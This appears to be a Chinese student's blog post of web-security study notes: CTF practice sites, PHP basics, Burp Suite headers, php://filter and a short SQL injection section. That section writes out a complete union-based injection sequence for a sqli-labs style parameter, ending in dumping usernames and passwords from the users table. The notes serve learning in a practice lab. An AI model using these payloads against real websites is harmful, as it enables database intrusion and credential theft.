开一个贴来记录一下网安web方向的学习
去年加入了我们学校的网安实验室学习后一直没有详细的总结学习的东西,所以现在开一个贴来粗略总结学过的知识点,就当是学习笔记了。
首先是一些练习的平台
XCTF:
Jarvisoj:
北联大:
CGCTF:
https://cgctf.nuptsast.com/challenges
i春秋:
https://www.ichunqiu.com/competition
wechall:
CTFS:
HTML
首先是粗略学习了HTML,参考网页https://www.runoob.com/html/html-tutorial.html
PHP
学习了PHP语言,首先是学习了基础的语法,当时感觉和我那时学的C艹差不多,循环语句中多了一种foreach,下面给出一个例子
1 <?php 2 $score=['张三'=>99,'李四'=>95,'王五'=>85]; 3 foreach ($score as $student=>$mark){ 4 echo $student." 得分:".$mark.PHP_EOL; 5 }
输出结果是
张三 得分:99 李四 得分:95 王五 得分:85
当然也学写了PHP的数据类型,在PHP数据的比较中有个比较有趣的点,如下
/** * 类型比较 * 松散比较:使用两个等号 == 比较,只比较值,不比较类型。 * 严格比较:用三个等号 === 比较,除了比较值,也比较类型。 * 参考链接:https://www.runoob.com/php/php-types-comparisons.html */
构造函数就是
<?php function functionName() { // 要执行的代码 } ?>
GET类型传参
get类传参可以直接通过URL进行,方法是在URL后加?name=value&name2=value2
POST类型传参
使用火狐浏览器插件hackbar进行post类传参
PHP正则表达式
可以筛选自己想要的和不想要的字符串
一个在线正则小工具:http://c.runoob.com/front-end/854
Burp Suite
bp的使用途径很广,可以用来抓包,给网站传数据,伪造域名等
X-Forwarded-For 请求端ip(本地一般为127.0.0.1)
Referer 先前网页的地址,当前请求网页紧随其后,即来路
php://filter
个人感觉算是一种漏洞注入,参考链接:
https://blog.csdn.net/destiny1507/article/details/82347371
SQL注入
感觉是一个很庞大的知识体系
挖个坑到时候详细总结,sqli-lab有很多很好用的题目,下面记录一个注入例子
1.?id=1 order by 4--+ 去到4发现报错,那么有3个字段显示 2.?id=-1' union select 1, 2, 3--+//发现2, 3 可以显示出来 3.?id=-1' union select 1, version(), database()--+爆数据库版本和数据库名字 4.?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+//爆表名 5.?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+//爆列 6.id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+爆username以及对应的password, 0x3a是16进制, ascii码是冒号,用以分割password和username
JavaScript
https://www.w3school.com.cn/js/index.asp
感觉还有好多知识点没有总结啊,日后做题再慢慢总结了,摸了
